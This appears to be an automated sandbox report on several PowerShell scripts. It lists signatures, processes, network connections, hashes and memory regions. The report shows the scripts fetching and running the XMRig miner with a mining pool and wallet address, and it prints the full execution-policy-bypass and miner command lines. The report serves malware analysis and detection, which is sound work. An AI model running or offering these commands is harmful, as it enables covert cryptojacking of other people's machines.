| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral25
Detonation Overview
| Submitted | 2024-07-04 03:15 |
| Reported | 2024-07-04 09:36 |
| Platform | win10v2004-20240611-en |
| Max time kernel | 1794s |
| Max time network | 1803s |
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1112 wrote to memory of 3744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| GB | 184.28.176.17:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 17.176.28.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xlw5fz4l.soj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral5
Detonation Overview
| Submitted | 2024-07-04 03:15 |
| Reported | 2024-07-04 09:14 |
| Platform | win10v2004-20240508-en |
| Max time kernel | 1799s |
| Max time network | 1791s |
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1060 wrote to memory of 3668 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
Files
memory/1060-0-0x00007FF894C93000-0x00007FF894C95000-memory.dmp
memory/1060-10-0x00000286370A0000-0x00000286370C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xjnhsydl.bg3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1060-11-0x00007FF894C90000-0x00007FF895751000-memory.dmp
memory/1060-12-0x00007FF894C90000-0x00007FF895751000-memory.dmp
memory/1060-14-0x00007FF894C90000-0x00007FF895751000-memory.dmp
memory/1060-15-0x0000028650320000-0x0000028650332000-memory.dmp
memory/1060-16-0x00000286370D0000-0x00000286370DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3668-47-0x000001C871C80000-0x000001C871CA0000-memory.dmp
memory/3668-48-0x000001C871CC0000-0x000001C871CE0000-memory.dmp
memory/3668-49-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-52-0x000001C871D00000-0x000001C871D20000-memory.dmp
memory/3668-51-0x000001C871CE0000-0x000001C871D00000-memory.dmp
memory/3668-50-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/1060-53-0x00007FF894C93000-0x00007FF894C95000-memory.dmp
memory/1060-54-0x00007FF894C90000-0x00007FF895751000-memory.dmp
memory/3668-55-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/1060-56-0x00007FF894C90000-0x00007FF895751000-memory.dmp
memory/3668-57-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-59-0x000001C871D00000-0x000001C871D20000-memory.dmp
memory/3668-58-0x000001C871CE0000-0x000001C871D00000-memory.dmp
memory/3668-60-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-61-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-62-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-63-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-64-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-65-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-66-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-67-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-68-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-69-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-70-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-71-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-72-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-73-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-74-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-75-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-76-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-77-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-78-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-79-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-80-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-81-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-82-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-83-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-84-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-85-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-86-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-87-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-88-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-89-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-90-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-91-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-92-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-93-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-94-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-95-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-96-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-97-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-98-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-99-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-100-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-101-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-102-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-103-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-104-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-105-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-106-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-107-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-108-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-109-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-110-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-111-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-112-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-113-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-114-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-115-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-116-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-117-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-118-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:23
Platform
win7-20240221-en
Max time kernel
1561s
Max time network
1561s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
Network
Files
memory/1904-4-0x000007FEF5E0E000-0x000007FEF5E0F000-memory.dmp
memory/1904-7-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp
memory/1904-8-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp
memory/1904-6-0x0000000001D90000-0x0000000001D98000-memory.dmp
memory/1904-5-0x000000001B820000-0x000000001BB02000-memory.dmp
memory/1904-9-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp
memory/1904-10-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp
memory/1904-11-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp
memory/1904-12-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:33
Platform
win10-20240611-en
Max time kernel
1797s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| (64 identical rows with no description, indicator, process or target) | | | |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2368 wrote to memory of 388 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2368 wrote to memory of 388 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
Files
memory/2368-3-0x00007FF925653000-0x00007FF925654000-memory.dmp
memory/2368-5-0x0000014760E90000-0x0000014760EB2000-memory.dmp
memory/2368-6-0x00007FF925650000-0x00007FF92603C000-memory.dmp
memory/2368-10-0x00007FF925650000-0x00007FF92603C000-memory.dmp
memory/2368-9-0x0000014779520000-0x0000014779596000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sgmzoe5w.qex.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2368-25-0x00007FF925650000-0x00007FF92603C000-memory.dmp
memory/2368-61-0x0000014779380000-0x000001477938A000-memory.dmp
memory/2368-48-0x00000147793A0000-0x00000147793B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/388-90-0x000001AE78200000-0x000001AE78220000-memory.dmp
memory/2368-91-0x00007FF925650000-0x00007FF92603C000-memory.dmp
memory/388-92-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/2368-93-0x00007FF925653000-0x00007FF925654000-memory.dmp
memory/2368-94-0x00007FF925650000-0x00007FF92603C000-memory.dmp
memory/2368-96-0x00007FF925650000-0x00007FF92603C000-memory.dmp
memory/388-95-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-97-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-98-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-99-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-100-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-101-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-102-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-103-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-104-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-105-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-106-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-107-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-108-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-109-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-110-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-111-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-112-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-113-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-114-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-115-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-116-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-117-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-118-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-119-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-120-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-121-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-122-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-123-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-124-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-125-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-126-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-127-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-128-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-129-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-130-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-131-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-132-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-133-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-134-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-135-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-136-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-137-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-138-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-139-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-140-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-141-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-142-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-143-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-144-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-145-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-146-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-147-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-148-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-149-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-150-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-151-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-152-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-153-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-154-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-155-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-156-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
memory/388-157-0x00007FF7715C0000-0x00007FF7721F3000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:35
Platform
win7-20240508-en
Max time kernel
1563s
Max time network
1563s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
Network
Files
memory/1520-4-0x000007FEF628E000-0x000007FEF628F000-memory.dmp
memory/1520-5-0x000000001B7F0000-0x000000001BAD2000-memory.dmp
memory/1520-6-0x0000000001D10000-0x0000000001D18000-memory.dmp
memory/1520-7-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
memory/1520-9-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
memory/1520-8-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
memory/1520-10-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
